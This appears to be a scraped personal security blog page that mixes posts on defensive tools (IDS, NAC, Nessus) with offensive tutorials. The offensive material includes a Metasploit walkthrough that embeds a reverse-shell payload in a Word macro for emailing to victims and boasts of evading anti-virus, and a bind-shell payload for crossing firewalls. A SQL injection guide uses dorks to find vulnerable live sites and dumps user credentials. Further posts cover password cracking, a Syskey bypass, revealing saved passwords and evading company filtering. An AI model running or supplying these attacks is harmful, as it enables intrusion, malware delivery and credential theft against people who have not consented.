Subscribe by RSS RSS Icon
Follow me on Twitter Twitter Icon

Smooth-Sec - Ready to-go IDS/IPS

Smooth-Sec is a ready to-go IDS/IPS (Intrusion Detection/Prevention System) Linux distribution based on the multi threaded Suricata IDS/IPS engine and Snorby, the top notch web application for network security monitoring. Smooth-Sec is built on Ubuntu 10.04 LTS using the TurnKey Core base as development platform.

Functionality is the key point that allows a user to deploy a complete IDS/IPS System up and running out of the box within a few minutes, even for security beginners with minimal Linux experience.



Features:

Snorby:
  • Metrics Metrics & Reports
  • Classifications
  • Full packet and session data.
  • Settings Custom Settings
  • Hotkeys

Suricata
  • Native IPv6 Support
  • Automatic protocol detection
  • Multi threaded
  • Native hardware acceleration support
  • Passive OS and Portscan detection
  • L7 Protocol awareness
  • IP Reputation using scoring threshold
  • Distributed blocking & feedback
  • Global flowbits and variables

Details:

Snorby login:
Snorby interface: https://ipaddress
Username: snorby@snorby.org
Password: snorby (please change this password after the firts login)

Ssh login:
Username: root
Password: the password you have chose during the installation

You can download Smooth-Sec here:

PCLoginNow - Free Password Recovery Tools for Windows

There might be many instances when you forgot or lost the administrator password for your Windows PC. This could put you in big trouble especially if you do not have any other OS configured for dual boot and this will prevent you from accessing your files as well. But there are free password recovery tools which can be used even if you do not have access to Windows.

PCLoginNow is an easy-to-use tool to reset local administrator and other accounts passwords on Windows system. No need to reinstall the system. It resets Windows passwords and Windows security settings instantly. All version of Windows are completely supported. It's an incredible CD for Home users and Businesses. And most of all, it's the most popular and safe solution for removing your Windows password until now.

Besides the abilities of resetting passwords, PCLoginNow can also help you maintain, change accounts policy setting and properties. You can easily upgrades an general account to administrator level, lock or unlock those accounts you don't need anymore, And moreover, all of these are done without booting your tedious, time-comsuming Windows System.

The most powerful feature PCLoginNow have is to support Syskey.

SYSKEY was an optional feature added in Windows NT 4.0 SP3. It was meant to protect against offline password cracking attacks so that the SAM database would still be secure even if someone had a copy of it.

Even thouth the system registry is proctected by Syskey, PCLoginNow can easily bypass this mechanism and reset the Windows passwords.


Read the user guide here:

You can download PCLoginNow here:

Wophcrack – Ophcrack Web Interface

Rainbow tables are really useful when cracking password hashes, One disadvantage of these tables is their size which can get up to tens and even hundreds of gigs. The author thought it would be extremely useful to have a personal web interface for your rainbow tables which you can access from anywhere on the web anywhere without having to carry the large tables with you everywhere you go. And well here we are, Wophcrack (Web)Ophcrack.



Wophcrack was designed to work on Backtrack 4 R2, although it can be install on any Linux distribution with some small adjustments, Wophcrack can also easily edited to support Rainbow Crack.

Installation: (For Backtrack user and Ubuntu Server)
1. Install mysql server
2. Set user,password root or user for mysql server
3. Create cracker database in mysql server
4. Import cracker.sql into your mysql server
5. Edit wophcrack/config.php with your environment.
6. Edit apache2 configuration(sites-available/default) file with (/pentest/password/wophcrack is the wophcrack path.)

        Alias /wophcrack "/pentest/password/wophcrack/"
        <Directory /pentest/password/wophcrack/>
                Options FollowSymLinks
                AllowOverride None
                Order allow,deny
                allow from all
        </Directory>




You can download Wophcrack here:

Ophcrack 3.3.1 - Windows Password Cracker Based on Rainbow Tables

Ophcrack is a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a Graphical User Interface and runs on multiple platforms. It works based on a time-memory trade-off using rainbow tables. This is a new variant of Hellman’s original trade-off, with better performance. It recovers 99.9% of alphanumeric passwords in seconds.

Features
  • Runs on Windows, Linux/Unix, Mac OS X
  • Cracks LM and NTLM hashes.
  • Free tables available for Windows XP and Vista.
  • Brute-force module for simple passwords.
  • Audit mode and CSV export.
  • Real-time graphs to analyze the passwords.
  • LiveCD available to simplify the cracking.
  • Loads hashes from encrypted SAM recovered from a Windows partition, Vista included.
  • Free and open source software (GPL).

You can download various tables for cracking windows password here.

Video tutorial on using Ophcrack.


 Download Ophcrack here:

Show Hidden Passwords Behind Asterisk

All Internet browsers have got a special feature which, as soon as you login your email account for example, prompt you to save password and username so that, next time you will use the service again, the browser will fill in the login interface for you. However, while the username is fully displayed, the password is hidden by asterisks. Now, if for any reason you don’t remember such a password you won’t have any way to recover it. Usually, to get it back, you will have to buy a special piece of software.

Alright, actually you could read out the asterisk with a simple javascript code. Go to the Web page containing the login in form where you saved your password. Just copy the following javascript code and paste it on the browser address bar. As soon as you press Enter, the browser will display a window containing the password!

Code:
javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();


Meterpreter and Teredo to Make Your Perimeter Useless

Teredo is a tunneling service built in to Windows. It’s intent was to allow anyone to have access to the IPv6 enabled internet, free, and dead simple, no infrastructure changes needed. Basically, an internal host is asking a Teredo server/relay for an IPv6 IP address. It does this over UDP and which by default in Windows points to teredo.ipv6.microsoft.com over port 3544 (UDP).

When the tunnel is established, the host is given a 2001::/32 address. This address is a public IP. This essentially meant that your Windows shares and any other listening service was publicly available, despite your NAT and Firewall. Unfortunately, Microsofts has issued a patch for this that deny all traffic from NAT Traversals (Teredo). However, you can still connect to your server over NAT Traversals with the help of bind_ipv6_tcp payload in Metasploit.




The commands used in the video are below:

netsh interface ipv6 install

netsh interface ipv6 set teredo enterpriseclient

./mspfayload windows/meterpreter/bind_ipv6_tcp LPORT=9001 X > bind.exe

The only thing that was behind the scenes was giving the Metasploit host an IPv6 address. I used Miredo (Teredo for *nix/OSX):

#Install miredo
apt-get install miredo

#Remove it from starting automatically
update-rc.d miredo –f remove

Metasploit - VBScript Infection Method

Metasploit has a couple of built in methods you can use to infect Word and Excel documents with malicious Metasploit payloads. This method is useful when going after client-side attacks and could also be potentially useful if you have to bypass some sort of filtering that does not allow executables and only permits documents to pass through. To begin, we first need to create our VBScript payload.

./msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.35.115 LPORT=8080 ENCODING=shikata_ga_nai X > payload.exe


Then, we need to convert our executable to VBScript using the "exe2vba.rb" script in the tools section:
ruby exe2vba.rb payload.exe payload.vbs

Now, copy our payload.vbs to Windows machine that has Microsoft Word or Excel installed. In Word or Excel 2003, go to Tools, Macros, Visual Basic Editor, if you're using Word/Excel 2007, go to View Macros, then place a name like "dgodam" for your macro and select "create".



This will open up the visual basic editor. Paste the output of the first portion of the payload script into the editor and save it.



Paste the remainder of the script into the word document itself. This is when you would perform the client-side attack by emailing this Word document to someone. 


Before we send off our malicious document to our victim, we first need to set up our Metasploit listener:

msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.10.35.115 LPORT=8080 E

We have our listener now on port 8080 waiting for a reverse connection from our victim.


We have a Meterpreter shell right to the system that opened the document, and best of all, it doesn't get picked up by anti-virus!!!

Nessus - Advanced Web Application Scanning

In my previous post I have described how to create Nessus policy for basic web application scanning. This time I'll show you how to create an advanced web application scanning for Nessus.

General Tab:
This should be the same as the basic web application scanning policy.



Plugins Tab:
  • CGI abuses
  • CGI abuses XSS
  • General
  • Setting
  • Databases
  • Web servers
 Add two additional plugins on top of the list: FTP and Gain a shell remotely.


Preferences Tab:

Global Variable Settings
Tick the following check box:


Web Application Test Settings:
Tick all the check boxes.



Login Configurations:
Put in the HTTP account and password field. Just use a common username and password.



HTTP Login Page:


Click submit and you're ready to go.

PacketFence - Free Open Source NAC System

PacketFence is a fully supported, trusted, Free and Open Source network access control (NAC) system. Boasting an impressive feature set including a captive-portal for registration and remediation, centralized wired and wireless management, 802.1X support, layer-2 isolation of problematic devices, integration with the Snort IDS and the Nessus vulnerability scanner; PacketFence can be used to effectively secure networks - from small to very large heterogeneous networks.


Why do I need PacketFence?
If your network is a breeding ground for worms, PacketFence is for you. If you have no idea who connects to your network and who owns a particular computer, PacketFence is for you. If you have no way of mapping a network policy violation to a user, PacketFence is for you.

What you can do with PacketFence
  • Block iPods wireless access
  • Forbid rogue access points
  • Perform compliance checks
  • Eliminate Peer-to-Peer traffic
  • Provide guest access
  • Simplify VLAN management

 Read more on PacketFence here:

Nessus - Basic Web Application Scanning

Nessus has long been known as a network vulnerability scanner but it contains quite a bit of functionality that can be used to identify vulnerabilities in web applications as well. Nessus does provide useful information that can be used as the foundation for web application assessments.

The first thing you need to do is to create a web application scanning policy for Nessus.

Go to the General tab.
Basic  -  Give a name for the policy for e.g. Web Application Scanning.
Scan - Enable the Safe Checks & Silent Dependencies
Network Congestion - Leave all unchecked
Port Scanners - Leave all unchecked
Port Scan Options - Put the common port for web application 80, 443, 8080, 8000, 8443
Performance - Leave as default


Next, go to Plugins tab and enabled the following plugins:
  • CGI abuses
  • CGI abuses XSS
  • General
  • Setting
  • Databases
  • Web servers

Lastly, go to Preferences tab and choose from the dropdown box "Global Variable Settings". Enabled the CGI scanning and Through tests.


Click submit and your web application policy is ready for scanning with Nessus.


You can download Nessus here:

Another SQL Injection Tutorial

These days when I'm doing penetration testing, I would normally use the automated SQL injection tools because it's much easier and faster. Even in my previous post also I only mentioned about these automated tools. However, I got this request from myHAC to write a step-by-step tutorial on SQL injection. Well I thought this could be a refresher for me and for other people to understand the underlying process behind the automated SQL injection tools. So here it goes.

What is SQL injection?
SQL(Structured Query Language) injection is an attack technique that exploits the vulnerability of the web application that communicates with the database of the server.This type of attack is successful if the application fails to validate the user supplied inputs in sql statements to communicate with the database there by allowing the attacker to gain control of all database resources.

Basic SQL Injection
The basic SQL injection attack is to bypass the login screen. Search for admin login page using the following dorks. (there are many more but i just want to keep this simple)

inurl:admin.asp
inurl:login.asp

Now that we have found the admin login page, we need to enter the following strings into the username and password text box. The commonly used SQL injection:

' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
and many more :)

Advanced SQL Injection
We need to find websites that are vulnerable to the attack. To do this we can use the following dorks:

inurl:index.php?catid=
inurl:index.php?id=
inurl:article.php?ID=
inurl:pageid=
inurl:page.php?file=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=

Step 1
Check whether the page is vulnerable to SQL injection or not. To do this just add a ' (apos) at the end of the URL.

http://testphp.vulnweb.com/listproducts.php?cat=1'


If the page returns an SQL error, the page is vulnerable to SQLi. If it loads normally, leave the page and move on to the next site in the search result.

Typical errors you'll get after appending the apostrophe are:
Warning: mysql_fetch_array():
Warning: mysql_fetch_assoc():
Warning: mysql_numrows():
Warning: mysql_num_rows():
Warning: mysql_result():
Warning: mysql_preg_match():


Step 2
Once you find a vulnerable site, you need to enumerate the number of columns and those columns that are accepting the queries from you.

Append an 'order by' statement to the URL.
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 1--

Continue increasing the number after order by till you get an error. So the highest number for which you do not get an error is the number of columns in the table. We got an error at 12 so the no of columns in the database is 11

http://testphp.vulnweb.com/listproducts.php?cat=1 order by 1--
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 2--
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 3--
----
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 12--


Step 3
Now, we need to find vulnerable columns by using UNION function. Also precede the number after "id=" with a hyphen or minus (-). Say from the above step, you got that the table has 11 columns.

http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,7,8,9,10,11

Result of this query will be the column numbers that are accepting the queries, in this case 2 and 7. Now we'll inject our SQL statements in one of these columns.


Step 4
We'll use the mysql command @@version to get the version of the db. We have to inject the command in one of the open columns. We know column 2 and 7 are vulnerable. Say we use column number 7.

http://testphp.vulnweb.com/listproducts.php?cat=-1 union all select 1,2,3,4,5,6,@@version,8,9,10,11

You'll get the version of the database in the place  where you had got the number 7 in step 3.


Note: if you get version 4 then it will be a bit difficult because we have to guess the tables and columns.

Step 5
Now we try and get list of databases on the site.

http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,group_concat(schema_name),3,4,5,6,7,8,9,10,11 from information_schema.schemata--


To know the current database in use:
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,concat(database()),3,4,5,6,7,8,9,10,11--


To get the current user:
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,concat(user()),3,4,5,6,7,8,9,10,11--


To get the tables
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,table_name,8,9,10,11 from information_schema.tables where table_schema=database()--


http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,group_concat(table_name),8,9,10,11 from information_schema.tables where table_schema=database()--


To get the columns:
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,group_concat(column_name),8,9,10,11 from information_schema.columns where table_schema=database()--


Get list of users
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,concat
(uname,0x3a,pass,0x3a,email,0x3a,name),8,9,10,11 from users


Note: 0x3a is the colon to separate the result.

SSH Tunneling to Bypass Internet Filtering

Most company nowadays deploy web proxy like Websense to filter users from surfing unrelated websites. However, there are several ways to bypass the restriction and in this tutorial I'm going to explain on SSH tunneling to do the dirty work for me. This technique helps me bypass the filtering when I need to and it also secures my web browsing by encrypting the traffic between web browser and the remote web sites that I'm connecting to.

SSH, the Secure Shell, is a standard protocol that encrypts communications between your computer and a server. The encryption prevents these communications from being viewed or modified by network operators. SSH is especially useful for censorship circumvention because it can provide encrypted tunnels and work as a generic proxy client.

We're going to need a couple of things in order to create an SSH tunnel that you can use as a SOCKS proxy.
  • A remote server you can connect to using SSH. This is typically a remote Unix or Linux server that supports SSH logins. For this tutorial, I'm going to use free SSH account from cjb.net
  • Your organisation will need to let you connect to that site using SSH. By default SSH runs on port 22, so your organization will need to let you out on port 22. Alternatively, you can use other port as well. In this case, cjb.net also allows you to connect on port 443
  • SSH client such as putty

Step 1 - Setup your SSH server
If you don't have one, you can use the free SSH account provided by cjb.net. Open up their registration page here, fill up all information needed, user name, your email address, password (password have to include at least one number and letter), and leave Bash as your default shell and press Continue.You should got an email from cjb within an activation links on it. Click the links to activate your account. they will send you another email about your complete login information after fully activated.


Step 2 - Download SSH client Putty
Just go to the official Putty website, and download the putty.exe executable file. There is no installation process -- just download it, drop it in a folder, and it's ready to be used.


Step 3: Configuring a tunnel to your SSH server
We'll use Putty to create an SSH tunnel and connect to the remote server. For the purposes of this example,  we are going to connect to our SSH account at shell.cjb.net.

First, fill “Host Name (or Ip Address)” with your “accountname@shell.cjb.net” and port with “22” (change account name with your cjb login name, check your email from cjb net for detail). Since my company firewall does not allow outgoing connection  for port 22, I'm going to use port 443 instead.

In the textfield labeled "Saved Sessions", enter a name that you want to use to identify this configuration. This is typically the hostname or IP address of your remote server, but it can also be something like "SSH tunnel". In my case I'm just going to put cjb.


Next, on the left side of the putty window there is a navigation tree. In that tree you want to select the Tunnels item. You can find it by clicking the Connection node in the tree, then SSH, and then Tunnels. Under the section labeled "Add a new forwarded port" type in a port 1080 (or whatever port you wish to use) for the source port. Put localhost in the Destination field, then select the Dynamic and Auto radio buttons. Then click the Add button, and you should see the text D1080 show up in the textarea just above the "Add a new forwarded port".


That's all you had to do to configure Putty. Now all you have to do is login to your remote server. To do this, just click the Open button at the bottom of the window. You should see a Putty login shell open up to your remote server. Just login to your remote server with your username and password, and you're done. Next you're going to configure your browser to use SOCKS proxy.



Step 4: Configure you Browser to use the Putty SSH tunnel as a SOCKS proxy

Firefox
Start Firefox, then select the Tools menu, and then select the Options menu item. Now click the Advanced icon (on the upper-right of the dialog), and then select the Network tab.


Now click the "Settings" button. This brings up the Connection Settings dialog. On this dialog click the "Manual proxy configuration" radio button, then put the address localhost in the SOCKS Host field. In the Port field just to the right of the SOCKS Host field enter the port you used when configuring your SSH tunnel with Putty. In my case this port was1080.


Internet Explorer
Open your IE, go to Tools >> Internet Options and the windows below will pop up. Go to the Connections tab and click on the LAN settings.


Then under Automatic configuration, unchecked the Automatically detect settings check box. In Proxy server, checked the two check boxes as shown below. Next, click Advanced.


Put the address localhost in the SOCKS Host field. In the Port field enter the port 1080.


That's all you need to do here and your browser should be ready to go.
 
Copyright Info.

Only for my personal reference. I do not own any of these materials here. Use it at your own risk!

XHTML/CSS validations
Valid XHTML 1.0 Transitional Valid CSS!